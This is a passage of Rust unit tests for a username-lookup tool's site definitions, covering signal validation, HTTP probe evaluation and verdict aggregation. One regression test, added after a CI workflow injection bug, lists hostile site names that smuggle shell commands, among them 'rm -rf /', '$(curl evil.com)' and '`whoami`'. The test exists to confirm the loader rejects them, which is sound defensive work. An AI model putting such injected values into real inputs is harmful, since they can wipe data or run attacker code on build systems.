        let site = site_with(Vec::new());
        let message = site.validate().unwrap_err().to_string();
        assert!(message.contains("signals list is empty"));
    }

    #[test]
    fn validate_rejects_empty_status_codes() {
        let site = site_with(vec![Signal::StatusFound { codes: Vec::new() }]);
        let message = site.validate().unwrap_err().to_string();
        assert!(message.contains("status signal"));
    }

    #[test]
    fn validate_rejects_empty_body_text() {
        let blank_body_rule = Signal::BodyAbsent {
            text: String::new(),
        };
        let message = site_with(vec![blank_body_rule])
            .validate()
            .unwrap_err()
            .to_string();
        assert!(message.contains("body signal"));
    }

    #[test]
    fn validate_rejects_empty_redirect_fragment() {
        let blank_redirect_rule = Signal::RedirectAbsent {
            fragment: String::new(),
        };
        let message = site_with(vec![blank_redirect_rule])
            .validate()
            .unwrap_err()
            .to_string();
        assert!(message.contains("redirect signal"));
    }

    #[test]
    fn validate_rejects_shell_metacharacters_in_name() {
        // Background: the validate-sites.yml workflow once passed
        // `--only "$name"`, with `$name` taken from a PR-controlled
        // sites.json. A name such as `Foo"; rm -rf /; #` could escape the
        // double quotes and run on the CI runner. Both the schema and this
        // loader now restrict names to a safe character class; the list
        // below samples the dangerous characters that must be refused.
        let hostile_names = [
            "Foo\"; rm -rf /; #",
            "Bar$(curl evil.com)",
            "Baz`whoami`",
            "Qux\\nfoo",
            "back\\slash",
            "pipe|ish",
            "semi;colon",
            "amp&and",
            "lt<gt>",
        ];
        for bad in hostile_names {
            let mut site = status_200_site();
            site.name = bad.to_owned();
            let err = site.validate().unwrap_err();
            assert!(
                err.to_string()
                    .contains("characters outside the allowed set"),
                "expected unsafe-name rejection for {bad:?}, got {err}",
            );
        }
    }

    #[test]
    fn validate_accepts_real_world_site_names() {
        // Sanity check against names that are actually shipped, so the
        // character-class restriction does not reject legitimate sites.
        let shipped_names = [
            "GitHub",
            "Steam Community (User)",
            "X / Twitter",
            "osu!",
            "Eintracht Frankfurt Forum",
            "Archive of Our Own",
            "Career.habr",
            "fl",
            "GitLab.com",
            "Sbazar.cz",
        ];
        for ok in shipped_names {
            let mut site = status_200_site();
            site.name = ok.to_owned();
            assert!(site.validate().is_ok(), "expected {ok:?} to validate");
        }
    }

    #[test]
    fn validate_rejects_overlong_name() {
        let mut site = status_200_site();
        site.name = "A".repeat(100);
        let message = site.validate().unwrap_err().to_string();
        assert!(message.contains("longer than"));
    }

    #[test]
    fn validate_accepts_well_formed_regex_check() {
        let mut site = status_200_site();
        site.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
        assert!(site.validate().is_ok());
    }

    #[test]
    fn validate_tolerates_unsupported_regex_features() {
        // Regexes imported from Sherlock sometimes contain lookarounds
        // such as `(?!...)`, which Rust's `regex` crate cannot compile.
        // Such a site must still load — the username gate is quietly
        // switched off instead of the whole site being rejected.
        let mut site = status_200_site();
        site.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
        let outcome = site.validate();
        assert!(
            outcome.is_ok(),
            "lookaround-bearing regex should warn, not reject the site"
        );
    }

    // ---- Per-signal evaluation ------------------------------------------

    #[test]
    fn signal_status_found_votes_only_on_match() {
        let rule = Signal::StatusFound { codes: vec![200] };

        let listed_status = Probe {
            status: 200,
            final_url: "https://example.com/alice",
            body: "",
        };
        assert_eq!(rule.evaluate(&listed_status), SignalVerdict::Found);

        // Same response, but with a status the signal does not list.
        let unlisted_status = Probe {
            status: 404,
            ..listed_status
        };
        assert_eq!(rule.evaluate(&unlisted_status), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_status_not_found_votes_only_on_match() {
        let rule = Signal::StatusNotFound { codes: vec![404] };

        let listed_status = Probe {
            status: 404,
            final_url: "",
            body: "",
        };
        assert_eq!(rule.evaluate(&listed_status), SignalVerdict::NotFound);

        // Same response, but with a status the signal does not list.
        let unlisted_status = Probe {
            status: 200,
            ..listed_status
        };
        assert_eq!(rule.evaluate(&unlisted_status), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_body_absent_votes_not_found_when_text_present() {
        let rule = Signal::BodyAbsent {
            text: "Profile not found".into(),
        };

        let error_page = Probe {
            status: 200,
            final_url: "",
            body: "<h1>Profile not found</h1>",
        };
        assert_eq!(rule.evaluate(&error_page), SignalVerdict::NotFound);

        // Same response, but the body no longer contains the marker text.
        let profile_page = Probe {
            body: "<h1>Welcome alice</h1>",
            ..error_page
        };
        assert_eq!(rule.evaluate(&profile_page), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_redirect_absent_inspects_final_url() {
        let rule = Signal::RedirectAbsent {
            fragment: "/login".into(),
        };

        let bounced_to_login = Probe {
            status: 200,
            final_url: "https://example.com/login?next=/alice",
            body: "",
        };
        assert_eq!(rule.evaluate(&bounced_to_login), SignalVerdict::NotFound);

        // Same response, but the final URL lacks the fragment.
        let stayed_on_profile = Probe {
            final_url: "https://example.com/alice",
            ..bounced_to_login
        };
        assert_eq!(rule.evaluate(&stayed_on_profile), SignalVerdict::Ambiguous);
    }

    // ---- Aggregation ----------------------------------------------------

    #[test]
    fn aggregate_found_when_only_found_signals_fire() {
        assert_eq!(
            aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]),
            MatchKind::Found
        );
    }

    #[test]
    fn aggregate_not_found_when_only_not_found_signals_fire() {
        assert_eq!(
            aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]),
            MatchKind::NotFound
        );
    }

    #[test]
    fn aggregate_not_found_wins_over_found() {
        // Negative-priority rule: NotFound beats Found when both are cast.
        assert_eq!(
            aggregate([SignalVerdict::Found, SignalVerdict::NotFound]),
            MatchKind::NotFound
        );
    }

    #[test]
    fn aggregate_uncertain_when_no_signals_fire() {
        assert_eq!(
            aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]),
            MatchKind::Uncertain
        );
    }

    #[test]
    fn aggregate_empty_is_uncertain() {
        assert_eq!(aggregate(std::iter::empty()), MatchKind::Uncertain);
    }

    #[test]
    fn needs_body_is_true_only_for_body_signals() {
        let without_body = [
            Signal::StatusFound { codes: vec![200] },
            Signal::StatusNotFound { codes: vec![404] },
            Signal::RedirectAbsent {
                fragment: "/login".into(),
            },
        ];
        for signal in without_body {
            assert!(!signal.needs_body());
        }

        let with_body = [
            Signal::BodyPresent { text: "x".into() },
            Signal::BodyAbsent { text: "x".into() },
        ];
        for signal in with_body {
            assert!(signal.needs_body());
        }
    }

    // ---- Deserialization ------------------------------------------------

    #[test]
    fn deserializes_signal_list() {
        let json = r#"{
            "name": "GitHub",
            "url": "https://github.com/{username}",
            "signals": [
                { "kind": "status_found", "codes": [200] },
                { "kind": "status_not_found", "codes": [404] }
            ]
        }"#;
        let parsed: Site = serde_json::from_str(json).unwrap();
        assert_eq!(parsed.name, "GitHub");
        assert_eq!(parsed.signals.len(), 2);
        parsed.validate().unwrap();
    }

    // ---- Property test --------------------------------------------------

    proptest::proptest! {
        /// Whatever combination of verdicts is generated, `aggregate` must
        /// agree with the negative-priority rule: NotFound if any vote is
        /// NotFound, otherwise Found if any vote is Found, otherwise
        /// Uncertain.
        #[test]
        fn aggregate_matches_negative_priority_spec(
            votes in proptest::collection::vec(
                proptest::prop_oneof![
                    proptest::strategy::Just(SignalVerdict::Found),
                    proptest::strategy::Just(SignalVerdict::NotFound),
                    proptest::strategy::Just(SignalVerdict::Ambiguous),
                ],
                0..16,
            ),
        ) {
            let any_not_found = votes.iter().any(|v| *v == SignalVerdict::NotFound);
            let any_found = votes.iter().any(|v| *v == SignalVerdict::Found);
            let expected = if any_not_found {
                MatchKind::NotFound
            } else if any_found {
                MatchKind::Found
            } else {
                MatchKind::Uncertain
            };

            let actual = aggregate(votes.iter().copied());
            proptest::prop_assert_eq!(actual, expected);
        }
    }
}